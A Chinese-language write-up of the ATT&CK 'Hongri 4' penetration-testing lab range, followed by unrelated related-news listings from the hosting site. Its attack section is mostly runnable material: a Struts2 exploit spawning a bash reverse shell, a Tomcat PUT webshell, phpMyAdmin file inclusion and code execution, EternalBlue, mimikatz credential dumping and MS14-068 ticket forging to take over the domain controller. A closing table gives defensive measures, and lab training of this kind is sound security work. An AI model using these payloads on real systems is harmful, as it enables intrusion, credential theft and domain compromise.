ATTCK 红日4靶场:3种漏洞组合利用与4步内网横向移动实战
ATTCK红日4靶场实战多漏洞组合利用与内网横向渗透全解析当安全工程师从靶场训练迈向真实攻防战场时最关键的跨越在于理解攻击链路的完整性和技术选择的战术思维。红日安全团队推出的ATTCK系列靶场正是模拟企业内网环境的绝佳训练平台。本文将深入剖析红日4靶场中Struts2、Tomcat、phpMyAdmin三大漏洞的组合利用以及从外网突破到域控拿下的四步横向移动实战过程。1. 靶场环境与攻击路径总览红日4靶场构建了一个典型的DMZ内网域环境架构包含以下关键节点Ubuntu主机192.168.93.136暴露SSH22和三个Web服务端口2001-2003内网域环境Win7域成员机器192.168.75.130域控制器DC192.168.75.132攻击路径可抽象为以下阶段graph TD A[外网信息收集] -- B[Struts2漏洞利用] A -- C[Tomcat漏洞利用] A -- D[phpMyAdmin漏洞利用] B -- E[初始立足点获取] C -- E D -- E E -- F[Docker逃逸] F -- G[内网探测] G -- H[横向移动] H -- I[域控接管]2. 外网突破口三漏洞组合拳2.1 Struts2-045远程代码执行2001端口运行的Struts2框架存在经典漏洞S2-045CVE-2017-5638攻击步骤如下漏洞检测python struts-pwn.py -u http://192.168.93.136:2001反弹Shell执行# 攻击机监听 nc -lvp 4444 # 利用漏洞执行 python struts-pwn.py -u http://192.168.93.136:2001 -c bash -i /dev/tcp/192.168.93.130/4444 01注意实际攻击中建议使用编码后的payload避免特殊字符问题2.2 Tomcat CVE-2017-12615漏洞利用2002端口的Tomcat服务存在PUT方法上传漏洞漏洞验证nikto -h http://192.168.93.136:2002Webshell上传PUT /shell.jsp/ HTTP/1.1 Host: 192.168.93.136:2002 Content-Type: text/jsp Content-Length: 25 % Runtime.getRuntime().exec(request.getParameter(cmd)); %权限维持# 转换为交互式shell python -c import pty; pty.spawn(/bin/bash)2.3 phpMyAdmin 4.8.1文件包含漏洞2003端口的phpMyAdmin存在CVE-2018-12613漏洞验证http://192.168.93.136:2003/?targettbl_zoom_select.php?/../../../../../../etc/passwdSession文件Getshell-- 创建测试表 CREATE TABLE test.shell (data TEXT NOT NULL ); -- 插入PHP代码 INSERT INTO test.shell (data) VALUES (?php system($_GET[cmd]); ?); -- 获取session文件路径 SELECT global.tmpdir;执行系统命令http://192.168.93.136:2003/?targettbl_zoom_select.php?/../../../../../../tmp/sess_[SESSION_ID]cmdid3. 内网横向移动四步法3.1 第一步信息收集与隧道建立获取初始shell后首先进行环境认知# 检查Docker环境 ls -alh /.dockerenv cat /proc/1/cgroup # 发现内网网段 ip a | grep -oP 192.168.75.\d # 建立SOCKS隧道以frp为例 # 靶机执行 ./frpc -c frpc.ini # 配置文件包含server_addr攻击机IP # 攻击机配置 [common] bind_port 70003.2 第二步内网主机探测通过Metasploit进行内网扫描msf6 use auxiliary/scanner/portscan/tcp msf6 set RHOSTS 192.168.75.0/24 msf6 set PORTS 445,3389,5985 msf6 set PROXIES socks5:攻击机IP:1080 msf6 run关键发现192.168.75.130Win7开放445/SMB192.168.75.132DC开放53/DNS3.3 第三步漏洞利用与权限提升针对Win7主机的攻击流程MS17-010漏洞检测msf6 use auxiliary/scanner/smb/smb_ms17_010 msf6 set RHOSTS 192.168.75.130 msf6 run永恒之蓝攻击msf6 use exploit/windows/smb/ms17_010_eternalblue msf6 set RHOST 192.168.75.130 msf6 set PAYLOAD windows/x64/meterpreter/bind_tcp msf6 run获取域用户凭证mimikatz.exe sekurlsa::logonpasswords输出示例Username : douser Domain : DEMO Password : Dotest1233.4 第四步域控接管与黄金票据利用MS14-068进行域提权生成伪造票据MS14-068.exe -u douserDEMO.com -s S-1-5-21-979886063-1111900045-1414766810-1107 -d 192.168.75.132 -p Dotest123注入黄金票据mimikatz # kerberos::purge mimikatz # kerberos::ptc TGT_douserDEMO.com.ccache验证域控访问dir \\WIN-ENS2VR5TR3N\c$4. 防御视角的思考与加固建议从蓝队角度分析攻击路径中的关键防御点攻击阶段防御措施检测方法初始访问Web应用WAF策略Struts2异常请求日志分析执行命令执行白名单非交互式shell行为检测权限提升及时修补MS17-010SMB异常流量监测横向移动网络分段主机防火墙Kerberos异常票据检测持久化定期审计域控权限黄金票据使用检测实战经验分享在一次真实渗透测试中我们发现虽然MS17-010补丁已安装但系统未重启导致补丁未生效。这种假修补情况在内网中尤为常见建议蓝队不仅要关注补丁安装更要验证实际防护状态。

相关新闻

嵌入式音频系统硬件选型与PIC18LF47K42+TS2007FC方案解析

嵌入式音频系统硬件选型与PIC18LF47K42+TS2007FC方案解析

1. 音频系统设计的硬件选型考量在嵌入式音频系统设计中,处理器与功放芯片的搭配选择直接影响最终音质表现。PIC18LF47K42作为Microchip旗下高性能8位MCU,与TS2007FC D类音频放大器的组合,为紧凑型音频设备提供了理想的解决方案。1.1 PIC18LF4…

2026/7/14 6:56:25 阅读更多 →
Unreal Engine集成cJSON:高性能JSON解析与序列化实战指南

Unreal Engine集成cJSON:高性能JSON解析与序列化实战指南

1. 项目概述:为什么要在UE里集成cJSON?如果你正在用Unreal Engine做游戏,尤其是涉及到网络通信、数据存档、配置读取或者和外部服务(比如你自己的游戏服务器、第三方API)打交道,那你肯定绕不开一个东西&…

2026/7/14 6:51:31 阅读更多 →
闲鱼市场监控神器:3步实现24小时自动采集与智能推送

闲鱼市场监控神器:3步实现24小时自动采集与智能推送

闲鱼市场监控神器:3步实现24小时自动采集与智能推送 【免费下载链接】idlefish_xianyu_spider-crawler-sender 闲鱼自动抓取/筛选/发送系统,xianyu spider crawler blablabla 项目地址: https://gitcode.com/gh_mirrors/id/idlefish_xianyu_spider-cra…

2026/7/15 8:19:34 阅读更多 →

最新新闻

电压模式Buck变换器环路补偿与EMI滤波器设计实战

电压模式Buck变换器环路补偿与EMI滤波器设计实战

1. 项目概述:从环路稳定到噪声抑制的完整设计 在开关电源的设计中,我们常常把大部分精力放在功率级的选型上,比如电感、MOSFET和电容。然而,一个电源能否在实际应用中稳定、可靠地工作,其“大脑”——控制环路的设计&a…

2026/7/15 9:42:58 阅读更多 →
如何在NestJS项目中集成OpenTelemetry?nestjs-otel快速上手指南

如何在NestJS项目中集成OpenTelemetry?nestjs-otel快速上手指南

如何在NestJS项目中集成OpenTelemetry?nestjs-otel快速上手指南 【免费下载链接】nestjs-otel OpenTelemetry (Tracing Metrics) module for Nest framework (node.js) 🔭 项目地址: https://gitcode.com/gh_mirrors/ne/nestjs-otel 在当今微服务…

2026/7/15 9:38:54 阅读更多 →
人工智能助力,微软修复创纪录的 570 个安全漏洞!

人工智能助力,微软修复创纪录的 570 个安全漏洞!

突发:微软修复创纪录 570 个安全漏洞2026 年 7 月 14 日,微软公司发布软件更新,修复了其 Windows 操作系统及其他软件中至少 570 个安全漏洞。这一数字几乎是该软件巨头在上月“补丁星期二”发布的破纪录更新中修复漏洞数量的三倍&#xff0c…

2026/7/15 9:38:54 阅读更多 →
NVDC充电控制器bq2477x:智能电源路径管理与系统性能优化

NVDC充电控制器bq2477x:智能电源路径管理与系统性能优化

1. 项目概述:为什么我们需要NVDC充电控制器? 在笔记本、平板这类便携设备里,电源管理芯片(PMIC)就像设备的心脏和大脑,负责把外部适配器或内部电池的电能,安全、高效、智能地分配给CPU、内存、屏…

2026/7/15 9:36:54 阅读更多 →
C# OnnxRuntime 部署 DAViD 深度估计

C# OnnxRuntime 部署 DAViD 深度估计

目录 说明 效果 模型信息 项目 代码 说明 官网地址:https://github.com/microsoft/DAViD 效果 模型信息 Model Properties ------------------------- metadata:{} ---------------------------------------------------------------Inputs ----…

2026/7/15 9:34:53 阅读更多 →
UE5第三人称相机系统:从弹簧臂组件到实战调优

UE5第三人称相机系统:从弹簧臂组件到实战调优

1. 项目概述:为什么第三人称相机是UE5项目的基石在虚幻引擎5(UE5)里鼓捣过角色控制的开发者,十有八九都跟相机系统“搏斗”过。尤其是第三人称视角,它远不止是把镜头拉到角色背后那么简单。一个手感糟糕、动不动穿墙或…

2026/7/15 9:28:50 阅读更多 →

日新闻

YOLO11 改进 - 特征融合 | STFFM空间时间特征融合模块,强化时空互补、抑制噪声,助力小目标检测高效涨点

YOLO11 改进 - 特征融合 | STFFM空间时间特征融合模块,强化时空互补、抑制噪声,助力小目标检测高效涨点

前言 本文介绍了面向红外小目标检测的时空特征融合模块——STFFM,用于增强复杂背景下目标与噪声、杂波的区分能力。该方法通过拼接空间特征与时间/运动特征,并结合通道注意力、空间注意力和残差增强机制,实现对关键语义通道与疑似目标区域的…

2026/7/15 0:01:00 阅读更多 →
YOLO26 改进 - 特征融合 | STFFM空间时间特征融合模块,强化时空互补、抑制噪声,助力小目标检测高效涨点

YOLO26 改进 - 特征融合 | STFFM空间时间特征融合模块,强化时空互补、抑制噪声,助力小目标检测高效涨点

前言 本文介绍了面向复杂背景小目标检测的时空特征融合模块——STFFM。该模块通过空间分支与时间/运动分支的特征拼接,引入通道注意力和空间注意力对融合特征进行自适应筛选,并结合残差增强与通道压缩,突出目标区域、抑制背景噪声。我们将 S…

2026/7/15 0:01:00 阅读更多 →
行星减速机为什么能提高扭矩?从功率守恒到输出扭矩校核

行星减速机为什么能提高扭矩?从功率守恒到输出扭矩校核

一、为什么减速以后扭矩会增大 旋转机械的功率、转速和扭矩之间存在以下关系: T 9550 P n 其中: T为扭矩,单位Nm; P为功率,单位kW; n为转速,单位r/min。 在功率基本不变的情况下:…

2026/7/15 0:03:00 阅读更多 →

周新闻

互联网大厂 Java 求职面试:燕双非的搞笑回答与技术探讨

互联网大厂 Java 求职面试:燕双非的搞笑回答与技术探讨

互联网大厂 Java 求职面试:燕双非的搞笑回答与技术探讨 在一个阳光明媚的上午,互联网大厂的面试官坐在桌前,准备迎接他的面试候选人——燕双非,一个以搞笑和幽默著称的程序员。第一轮提问 面试官:燕双非,作…

2026/7/14 16:53:23 阅读更多 →
车载以太网PMA测试设备选型:示波器、VNA、信号源3类仪器关键参数与预算评估

车载以太网PMA测试设备选型:示波器、VNA、信号源3类仪器关键参数与预算评估

车载以太网PMA测试设备选型:示波器、VNA、信号源3类仪器关键参数与预算评估在智能驾驶和车联网技术快速发展的今天,车载以太网作为新一代车载网络的核心传输技术,其物理层性能直接决定了数据传输的可靠性和稳定性。1000BASE-T1作为当前主流的…

2026/7/14 14:00:13 阅读更多 →
VSCode EIDE 插件 2.0:APM32/STM32 项目迁移实战,5步完成Keil工程转换

VSCode EIDE 插件 2.0:APM32/STM32 项目迁移实战,5步完成Keil工程转换

VSCode EIDE 插件 2.0:APM32/STM32 项目迁移实战指南嵌入式开发领域正经历一场工具链的静默革命。当传统Keil用户首次打开VSCode的扩展市场搜索EIDE时,往往会惊讶于这个看似简单的插件竟能重构十余年的开发习惯。本文将揭示如何用五个精准步骤&#xff0…

2026/7/14 7:15:24 阅读更多 →

月新闻